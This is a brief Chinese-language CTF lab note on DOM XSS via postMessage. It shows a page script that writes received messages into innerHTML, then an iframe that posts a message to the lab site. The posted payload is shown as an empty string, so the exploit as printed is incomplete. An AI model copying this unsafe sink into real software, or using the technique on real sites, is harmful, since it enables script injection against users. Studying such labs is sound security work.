CTF-WEB: 利用Web消息造成DOM XSS

如果索引中有类似如下代码

<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

你可能感兴趣的:(xss,网络安全)